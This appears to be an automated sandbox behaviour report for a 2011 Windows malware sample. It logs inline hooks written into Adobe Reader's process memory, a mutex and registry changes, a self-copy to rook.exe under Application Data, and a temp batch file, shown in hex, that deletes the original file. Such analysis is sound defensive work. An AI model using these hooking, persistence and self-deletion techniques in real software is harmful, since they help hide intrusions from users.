Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 77212EBC Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2665291545
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 77212EBC Length: 30 Value: 8B FF 55 8B EC 83 EC 14 53 33 DB 56 33 F6 33 C0 39 5D 08 57 89 5D F8 89 5D EC 89 5D FC 75 success or wait 2665291902
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 6FC0014 Length: 10 Value: 8B FF 55 8B EC E9 A3 2E 25 70 success or wait 2665300367
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 77212EBC Length: 5 Value: E9 FD 4B DB 8E success or wait 2665301330
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 77212EBC Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2665301654
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771C60A1 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2665302759
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771C60A1 Length: 30 Value: 8B FF 55 8B EC 6A 13 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 36 C6 FF FF 5D success or wait 2665310469
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 6FC001E Length: 10 Value: 8B FF 55 8B EC E9 7E 60 20 70 success or wait 2665311471
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771C60A1 Length: 5 Value: E9 6F 1A E0 8E success or wait 2665320208
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771C60A1 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2665320605
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771CE9C1 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2665321691
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771CE9C1 Length: 30 Value: 8B FF 55 8B EC 83 EC 14 53 56 33 C0 57 33 D2 33 DB 33 FF 33 C9 39 55 08 89 45 F8 89 45 EC success or wait 2665322050
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 6FC0028 Length: 10 Value: 8B FF 55 8B EC E9 94 E9 20 70 success or wait 2665330462
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771CE9C1 Length: 5 Value: E9 A6 91 DF 8E success or wait 2665331420
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771CE9C1 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2665331745
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 77212FC1 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2665332361
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 77212FC1 Length: 30 Value: 8B FF 55 8B EC 53 56 57 33 DB 33 C0 33 C9 33 D2 33 FF 39 5D 10 75 39 8B 75 0C 85 F6 74 21 success or wait 2665340076
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 6FC0032 Length: 10 Value: 8B FF 55 8B EC E9 8A 2F 25 70 success or wait 2665341065
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 77212FC1 Length: 5 Value: E9 4B 4C DB 8E success or wait 2665349394
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 77212FC1 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2665349663
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771C4D8C Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2665350749
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771C4D8C Length: 30 Value: 8B FF 55 8B EC 51 51 53 56 33 DB 33 F6 F6 05 94 BD 23 77 01 89 5D FC 0F 84 BA 7E 00 00 39 success or wait 2665351106
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 6FC003C Length: 10 Value: 8B FF 55 8B EC E9 4B 4D 20 70 success or wait 2665360881
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771C4D8C Length: 5 Value: E9 25 2F E0 8E success or wait 2665361839
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771C4D8C Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2665362161
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771C82EA Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2665362765
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771C82EA Length: 30 Value: 8B FF 55 8B EC 83 EC 24 53 33 DB 39 1D 8C B8 23 77 57 89 5D F4 89 5D F8 89 5D F0 C7 45 E8 success or wait 2665372840
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 6FC0046 Length: 10 Value: 8B FF 55 8B EC E9 9F 82 20 70 success or wait 2665373836
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771C82EA Length: 5 Value: E9 0A FA DF 8E success or wait 2665383192
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771C82EA Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2665383523
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771F9100 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2665384361
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771F9100 Length: 30 Value: 8B FF 55 8B EC 83 EC 20 53 56 33 C0 57 33 FF 40 39 3D 8C B8 23 77 89 7D FC 89 7D F8 89 45 success or wait 2665384729
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 6FC0050 Length: 10 Value: 8B FF 55 8B EC E9 AB 90 23 70 success or wait 2665394485
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771F9100 Length: 5 Value: E9 34 EC DC 8E success or wait 2665395440
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771F9100 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2665395760
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771D89F7 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2665396800
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771D89F7 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D 8C B8 23 77 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 2665405298
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 6FC005A Length: 10 Value: 8B FF 55 8B EC E9 98 89 21 70 success or wait 2665406282
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771D89F7 Length: 5 Value: E9 8B F3 DE 8E success or wait 2665415666
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771D89F7 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2665415991
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771C79C2 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2665417074
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771C79C2 Length: 30 Value: 6A 2C 68 10 7B 1C 77 E8 A7 9C FE FF 33 DB 89 5D DC 89 5D E4 39 1D 8C B8 23 77 0F 84 E8 95 success or wait 2665417436
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 6FC0064 Length: 12 Value: 6A 2C 68 10 7B 1C 77 E9 59 79 20 70 success or wait 2665423103
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771C79C2 Length: 5 Value: E9 F0 03 E0 8E success or wait 2665424077
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771C79C2 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2665424400
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771F9C53 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2665425392
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771F9C53 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 0C FF 75 08 E8 1A F4 FD FF 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 2665434194
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 6FC0070 Length: 10 Value: 8B FF 55 8B EC E9 DE 9B 23 70 success or wait 2665435187
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771F9C53 Length: 5 Value: E9 B4 E1 DC 8E success or wait 2665444568
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771F9C53 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2665444841
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771D9064 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2665445828
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771D9064 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 2665446185
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 6FC007A Length: 10 Value: 8B FF 55 8B EC E9 E5 8F 21 70 success or wait 2665455443
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771D9064 Length: 5 Value: E9 BB ED DE 8E success or wait 2665456395
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771D9064 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2665456716
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771BB1D8 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2665457945
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771BB1D8 Length: 30 Value: 8B FF 55 8B EC 83 EC 48 53 8B 5D 10 56 33 F6 39 75 14 57 8B 7D 0C C7 45 F4 01 00 00 00 89 success or wait 2665469723
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 6FC0084 Length: 10 Value: 8B FF 55 8B EC E9 4F B1 1F 70 success or wait 2665470779
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771BB1D8 Length: 5 Value: E9 5F CC E0 8E success or wait 2665479405
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771BB1D8 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2665480235
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 71AB3E2B Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2665480804
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 71AB3E2B Length: 30 Value: 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 2665481203
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 6FC008E Length: 10 Value: 8B FF 55 8B EC E9 98 3D AF 6A success or wait 2665503714
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 71AB3E2B Length: 5 Value: E9 3E E9 51 94 success or wait 2665504702
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 71AB4C27 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 2665521238
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 71AB68FA Length: 30 Value: 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 2665589589
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 71AB676F Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 5E 4A 00 00 8D 45 success or wait 2665859541
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 71AB4CB5 Length: 30 Value: 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 80 65 00 00 8D 45 F8 50 E8 DD success or wait 2665862544
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7E41ECA3 Length: 30 Value: B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 2665868288
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7E41FE6E Length: 30 Value: B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 2665875929
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7E428D20 Length: 30 Value: 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 2665947979
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7E42C17E Length: 30 Value: 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 2665952058
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7E423D3A Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 2665955969
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7E43E577 Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 2666082257
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7E430833 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 2666182214
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7E44F965 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 2666248169
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7E430A47 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 2666252391
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7E44F9B4 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 2666255655
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7E42A01E Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 2666260847
System info queried Type: ProcessInformation success or wait 2666544892
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 6FD0000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2666552409
Thread created PID: 1732 TID: 2140 EIP: 7C8106F9 Imagepath: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Injected: false success or wait 2666892358
Mutant created Name: \BaseNamedObjects\Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44} object name exists 2666935438
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 15807505 success or wait 2666935999
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 15807505 success or wait 2666936517
Key value replaced with new Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 15807505 Type: Dword Data: -1521036916 Old data: -1521036924 success or wait 2667051482
System info queried Type: ProcessInformation success or wait 2786832483
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 6FD0000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2786839294
Thread created PID: 1732 TID: 2556 EIP: 7C8106F9 Imagepath: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Injected: false success or wait 2787136056
Analysis File: 0.7663042396006076.exe PID: 580 Parent PID: 1712
+ Sections
+ General
Start time: 05:44:25
Start date: 08/12/2011
Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe
Commandline: .7663042396006076.exe
Imagebase: 0x400000
File size: 257536 bytes
MD5 hash: 74185020DEA5693BC25348C6AF34CF87
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 2 411C01
C:\Documents and Settings\Administrator\Application Data read attributes and synchronize and generic read synchronous io non alert and open for backup ident false success or wait 1 411FD5
C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe read attributes and write attributes and synchronize synchronous io non alert and non directory file false success or wait 1 411ECA
C:\Documents and Settings\Administrator\Application Data\Avliy read attributes and write attributes and synchronize synchronous io non alert and non directory file false file is a directory 1 411ECA
C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi read attributes and write attributes and synchronize synchronous io non alert and non directory file false success or wait 1 411ECA
C:\Documents and Settings\Administrator\Application Data\Ehotpo read attributes and write attributes and synchronize synchronous io non alert and non directory file false file is a directory 1 411ECA
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat read attributes and synchronize and generic write synchronous io non alert and non directory file true success or wait 1 411B8E
+ File created
File Path Access Attributes Options Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Avliy read data or list directory and synchronize normal directory file and synchronous io non alert and open for backup ident success or wait 1 412AE5
C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe read attributes and synchronize and generic read and generic write normal synchronous io non alert and non directory file success or wait 2 412B36
C:\Documents and Settings\Administrator\Application Data\Ehotpo read data or list directory and synchronize normal directory file and synchronous io non alert and open for backup ident success or wait 1 412AE5
C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi read attributes and synchronize and generic read and generic write normal synchronous io non alert and non directory file success or wait 1 412B36
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat read attributes and synchronize and generic read and generic write normal synchronous io non alert and non directory file success or wait 1 411DD7
+ File deleted
File Path Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe success or wait 1 411D4D
+ File written
File Path Offset Length Value Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe none 257536 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 BA 10 00 0E 1F B4 09 CD 21 B8 01 4C CD 21 90 90 54 68 69 73 20 70 72 6F 67 72 61 6D 20 6D 75 73 74 20 62 65 success or wait 1 411BB1
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat none 244 40 65 63 68 6F 20 6F 66 66 0D 0A 3A 64 0D 0A 64 65 6C 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 44 65 73 6B 74 6F 70 5C 30 2E 37 36 36 33 30 34 32 33 39 36 30 30 36 30 37 36 2E 65 78 65 22 0D 0A 69 66 20 65 78 69 73 success or wait 1 411BB1
+ File read
File Path Offset Length Value Completion Count Source Address
C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe none 257536 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 BA 10 00 0E 1F B4 09 CD 21 B8 01 4C CD 21 90 90 54 68 69 73 20 70 72 6F 67 72 61 6D 20 6D 75 73 74 20 62 65 success or wait 2 411C56
+ Other file operations
File Path Disposition Data Ascii Data Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe BasicInformation Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary success or wait 2 411D43
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 270000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 290000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2E0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 330000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown 330000 24576 own pid readonly object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown 330000 24576 own pid readonly object name not found 1
\KnownDlls\compstui.dll write and read and execute unknown 330000 24576 own pid readonly object name not found 1
C:\WINDOWS\system32\compstui.dll query and write and read and execute image 6E680000 241664 own pid read write success or wait 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\MSIMG32.dll write and read and execute unknown 77FE0000 69632 own pid read write object name not found 1
C:\WINDOWS\system32\msimg32.dll query and write and read and execute image 76380000 20480 own pid read write success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
\KnownDlls\ddraw.dll write and read and execute unknown 77F60000 483328 own pid read write object name not found 1
C:\WINDOWS\system32\ddraw.dll query and write and read and execute image 73760000 307200 own pid read write success or wait 1
\KnownDlls\DCIMAN32.dll write and read and execute unknown 73760000 307200 own pid read write object name not found 1
C:\WINDOWS\system32\dciman32.dll query and write and read and execute image 73BC0000 24576 own pid read write success or wait 1
\KnownDlls\resutils.dll write and read and execute unknown 73BC0000 24576 own pid read write object name not found 1
C:\WINDOWS\system32\resutils.dll query and write and read and execute image 750B0000 73728 own pid read write success or wait 1
\KnownDlls\CLUSAPI.dll write and read and execute unknown 750B0000 73728 own pid read write object name not found 1
C:\WINDOWS\system32\clusapi.dll query and write and read and execute image 76D10000 73728 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
\KnownDlls\scarddlg.dll write and read and execute unknown 769C0000 737280 own pid read write object name not found 1
C:\WINDOWS\system32\scarddlg.dll query and write and read and execute image 5CFE0000 90112 own pid read write success or wait 1
\KnownDlls\MFC42u.DLL write and read and execute unknown 5CFE0000 90112 own pid read write object name not found 1
C:\WINDOWS\system32\mfc42u.dll query and write and read and execute image 72830000 991232 own pid read write success or wait 1
\KnownDlls\WinSCard.dll write and read and execute unknown 72830000 991232 own pid read write object name not found 1
C:\WINDOWS\system32\winscard.dll query and write and read and execute image 723D0000 114688 own pid read write success or wait 1
\KnownDlls\WTSAPI32.dll write and read and execute unknown 723D0000 114688 own pid read write object name not found 1
C:\WINDOWS\system32\wtsapi32.dll query and write and read and execute image 76F50000 32768 own pid read write success or wait 1
\KnownDlls\WINSTA.dll write and read and execute unknown 76F50000 32768 own pid read write object name not found 1
C:\WINDOWS\system32\winsta.dll query and write and read and execute image 76360000 65536 own pid read write success or wait 1
\KnownDlls\NETAPI32.dll write and read and execute unknown 5B860000 348160 own pid read write success or wait 1
\KnownDlls\COMCTL32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
\KnownDlls\ShimEng.dll write and read and execute unknown 5D090000 630784 own pid read write object name not found 1
C:\WINDOWS\system32\shimeng.dll query and write and read and execute image 5CB70000 155648 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 28C0000 1208320 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\aclayers.dll write and read and execute commit 350000 475136 own pid execute success or wait 1
C:\WINDOWS\AppPatch\aclayers.dll write and read and execute commit 350000 475136 own pid execute success or wait 1
C:\WINDOWS\AppPatch\aclayers.dll query and write and read and execute image 71590000 495616 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\WINSPOOL.DRV write and read and execute unknown 7C9C0000 8482816 own pid read write object name not found 1
C:\WINDOWS\system32\winspool.drv query and write and read and execute image 73000000 155648 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 360000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 3B0000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 3B0000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
C:\WINDOWS\system32\compstui.dll read commit 2DA0000 229376 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 2DA0000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 3E0000 4096 own pid execute success or wait 1
